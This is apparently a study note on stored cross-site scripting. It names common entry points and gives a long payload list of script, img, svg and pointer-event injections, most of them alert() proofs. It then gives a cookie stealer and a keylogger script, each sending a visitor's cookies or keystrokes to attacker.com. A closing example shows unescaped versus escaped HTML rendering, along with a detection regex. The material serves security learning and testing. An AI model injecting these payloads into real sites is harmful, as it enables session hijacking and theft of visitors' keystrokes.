# XSS Stored

It follows the same logic as reflected XSS, except that the malicious JavaScript is stored directly in the web application's database and executes whenever a user, admin, or the attacker visits the page where the code was injected. As a result, the attacker can grab the session cookie or even establish a reverse shell connection. This typically happens when a website accepts user input that is not sanitized (the "bad parts" of the user's input are not removed) before it is inserted into the database. An attacker then places a payload in a field, for example when signing up to the website, and that payload is stored in the website's database. If the website does not properly sanitize that field, then whenever the site displays it on a page, the payload executes for everyone who visits.

Entry Points

* Comments on a blog
* User profile information
* Website listings

Example Payloads

```
<script>alert('Hi_threr')</script>
```

```
<script>alert(String.fromCharCode(88,83,83))</script>
```

suitable for escaping input tags

```
"><script>alert('XSS');</script>
```

suitable for escaping text areas

```
</textarea><script>alert('THM');</script>
```

```
';alert('THM');//'
```

```
<img src=x onerror=alert('XSS');>
```

```
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
```

```
<img src=x:alert(alt) onerror=eval(src) alt=xss>
```

```
"><img src=x onerror=alert('XSS');>
```

```
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
```

```
<svg onload=alert('XSS')>
```

```
<svg/onload=alert('XSS')>
```

```
<svg onload=alert(String.fromCharCode(88,83,83))>
```

```
<svg id=alert(1) onload=eval(id)>
```

```
<svg onload=alert(String.fromCharCode(88,83,83))>
```

```
"><svg onload=alert(/XSS/)>
```

```
<svg><script href=data:,alert(1) />
```

Firefox is the only browser which allows a self-closing script tag.

```
<div onpointerover="alert(45)">MOVE HERE</div>
```

```
<div onpointerdown="alert(45)">MOVE HERE</div>
```

```
<div onpointerenter="alert(45)">MOVE HERE</div>
```

```
<div onpointerleave="alert(45)">MOVE HERE</div>
```

```
<div onpointermove="alert(45)">MOVE HERE</div>
```

```
<div onpointerout="alert(45)">MOVE HERE</div>
```

```
<div onpointerup="alert(45)">MOVE HERE</div>
```

Cookie Stealer

```javascript
<script>fetch('https://attacker.com/cookie' + btoa(document.cookie));</script>
```

OR

```javascript
<script>window.location='http://attacker.com/cookie='+document.cookie;</script>
```

keylogger payload that records every keystroke on a certain page

```javascript
<script>document.onkeypress = 
function(e) {
    fetch('https://attacker.com/log?key=' + btoa(e.key));
}</script>
```
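To see why the payloads above fire, and what stops them, here is an added example (not part of the original notes) of a minimal comment feature that stores user input and renders it into HTML, first unescaped and then with output encoding for text-node and quoted-attribute contexts. The `comments` array, the function names and the sample inputs are all constructed for this illustration.

```javascript
// Added illustration, not code from the original page. Run with Node.js.
const comments = []; // stands in for the application's database table

function storeComment(author, body) {
  // Storing the raw value is not the bug: the bug is where it is placed into HTML.
  comments.push({ author, body });
}

// Vulnerable: raw interpolation of stored values into the HTML response.
function renderCommentsVulnerable() {
  return comments
    .map(c => `<li><b>${c.author}</b>: ${c.body}</li>`)
    .join('\n');
}

// Escape the five characters that can break out of a text node or a quoted attribute.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, ch => map[ch]);
}

// Hardened: every untrusted value is encoded at output time, in its HTML context.
function renderCommentsSafe() {
  return comments
    .map(c => `<li><b>${escapeHtml(c.author)}</b>: ${escapeHtml(c.body)}</li>`)
    .join('\n');
}

// Heuristic check for a rendered page: does stored input survive as a script tag,
// an inline event handler or an svg/img element? (A quick test aid, not a parser.)
function containsActiveContent(html) {
  return /<script\b|<\/script>|\bon\w+\s*=|<svg\b|<img\b/i.test(html);
}

// Constructed sample input: the first payload from the list above plus a benign comment.
storeComment('mallory', "<script>alert('Hi_threr')</script>");
storeComment('alice', 'Great post!');

console.log('vulnerable:\n' + renderCommentsVulnerable());
console.log('hardened:\n' + renderCommentsSafe());
```

The `">` prefixed payloads above target a value echoed inside a quoted attribute; the same `escapeHtml` neutralises them there because `"` becomes `&quot;`.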
